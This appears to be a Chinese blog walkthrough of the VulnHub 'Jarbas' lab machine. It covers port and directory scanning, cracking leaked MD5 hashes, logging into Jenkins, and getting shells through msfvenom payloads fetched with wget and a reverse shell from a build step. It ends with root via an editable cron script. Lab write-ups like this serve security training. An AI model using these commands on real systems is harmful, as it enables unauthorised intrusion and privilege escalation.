JARBAS - VulnHub(漏洞靶场渗透测试)

靶机地址:https://www.vulnhub.com/entry/jarbas-1,232/

主机发现
sudo netdiscover -i eth 0 -r 192.168.217.0/24
image.png
namp快速扫描,将端口信息保存到txt中
sudo nmap -n -v -sS -p- 192.168.217.132 --min-rate=10000 --max-retries=0 -oN allports.txt -Pn
image.png
对txt文件中的端口进行默认扫描
nmap -n -v -sC -sV -p $(cat allports.txt | grep ^[0-9] |cut -d / -f1 | tr '\n' ',' | sed s/,$//) 192.168.217.132 -oN nmap.txt -Pn
image.png
通过feroxbuster扫描目录
sudo feroxbuster -w /usr/share/wordlists/dirb/big.txt -u http://192.168.217.132/
image.png
发现没有什么可用目录,那我们根据对页面的观察和之前扫描出的,指定一下后缀-x html,这里就抓到了access.html
image.png
进入http://192.168.217.132/access.html,显示
image.png
可以用hash-identifier识别一下,其实可以看出来应该是md5,找网站解密一下
tiago:5978a63b4654c73c60fa24f836386d87 -> tiago:italia99
trindade:f463f63616cb3f1e81ce46b39f882fd5 -> trindade:marianna
eder:9b38e2b1e8b12f426b0d208a7ab6cb98 -> eder:vipsu

进入http://192.168.217.132:8080/,是一个jenkins登陆界面
image.png
通过eder:vipsu成功登陆到jenkins管理界面
image.png
进入 系统管理->脚本命令行,执行whoami
image.png
尝试反弹shell
看有没有python环境,执行which python
image.png

msfvenom -p python/meterpreter/reverse_tcp lhost=192.169.217.129 lport=2233 -f raw > shell.py
image.png
python3 -m http.server
image.png
msf开启监听
image.png
Jenkins的脚本命令行中执行命令,下载该py文件
println "wget http://192.168.217.129:8000/shell.py".execute().text
然后运行该py文件
这里没有接收到反弹的shell,失败

尝试另一处
点击“新建任务”,这里我们创建一个任务test
image.png
点击“构建”,在“构建”里,可以增加构建步骤,这里我们选择“Execute shell”
image.png

image.png
保存后,点击立即构建(Build Now)
image.png
kali这边利用msf接收到反弹的shell
image.png
或者nc连接
image.png
我们需要构造一个完全交互的TTY
第一步:使用Python生成功能更好的bash shell,但仍然不能使用tab自动补全或方向键。
python -c 'import pty; pty.spawn("/bin/bash")'
第二步:使我们能够访问术语命令,如clear。
export TERM=xterm
挂起shell
ctrl+z
退回我们自己的终端
stty raw -echo; fg
关闭了我们自己的终端回显,使我们能够访问制表符自动补全、方向键和Ctrl + C来终止进程
stty rows 38 columns 116
image.png
查看/etc/passwd,能够正常交互的有root、eder
image.png
查看shadow文件显示权限不够
查看计划任务,cat /etc/crontab(不同Linux的计划任务目录不同)
以root身份去执行一个脚本文件,尝试能否用它来提权
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
image.png
查看该文件内容,一个删除指令
image.png
这里我们可以vim进去修改,也可以使用echo/tee等命令将内容写进去
image.png
我们在kali里使用nc接收到反弹的shell
image.png
最后拿到flag(也可以通过python等构造一个完全交互式的TTY)
image.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值